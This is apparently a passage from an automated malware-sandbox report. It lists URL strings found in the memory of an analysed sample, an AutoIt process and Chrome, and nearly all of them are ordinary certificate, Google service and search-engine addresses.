                Source: Dry.com.1.dr, Saved.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Dry.com.1.dr, Saved.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Dry.com, 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp, Dry.com.1.dr, Volunteer.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: 9EI7wrGs4K.exeString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 0000000F.00000003.2056228731.0000335C00294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 0000000F.00000003.2032463490.0000335C007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2029625443.0000335C00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078008068.0000335C03098000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078919962.0000335C03054000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 0000000F.00000003.2044447862.0000335C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2052211296.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2033004820.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2032887424.0000335C00C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2037451733.0000335C00C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034342009.0000335C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2036290539.0000335C00CC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 0000000F.00000003.2016125258.000075F8002DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2016145639.000075F8002E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000000A.00000002.2459819787.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, UKX479.10.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: chrome.exe, 0000000F.00000003.2077583971.0000335C02FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 0000000F.00000003.2074915631.0000335C02A98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-staging.corp.google.com/
                Source: chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                Source: chrome.exe, 0000000F.00000003.2024387096.0000335C00490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabo
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                Source: Dry.com, 0000000A.00000002.2459089556.00000000016BF000.00000004.00000020.00020000.00000000.sdmp, EKXT2N.10.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: chrome.exe, 0000000F.00000003.2061483140.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2034211424.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2058149908.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045029197.0000335C00BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084657572.0000335C00BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/5
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/9
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/;
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/R
                Source: chrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/hk
                Source: chrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                Source: chrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                Source: chrome.exe, 0000000F.00000003.2020338956.0000259400694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                Source: chrome.exe, 0000000F.00000003.2074257167.0000335C02A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2074815994.0000335C02A10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 0000000F.00000003.2066144141.0000335C0280C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: UKX479.10.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: chrome.exe, 0000000F.00000003.2032436909.0000335C00390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 0000000F.00000003.2066823112.0000335C02D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 0000000F.00000003.2066823112.0000335C02D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 0000000F.00000003.2066823112.0000335C02D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard3
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000003.2082233107.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2077853947.0000335C02FD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2078082354.0000335C02F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2082270243.0000335C0300C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2084233769.0000335C01C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 0000000F.00000003.2045245740.0000335C0111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045652191.0000335C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2045107909.0000335C003B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 0000000F.00000003.2020054096.00002594003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2019787344.00002594003A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 0000000F.00000003.2020633666.00002594006F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
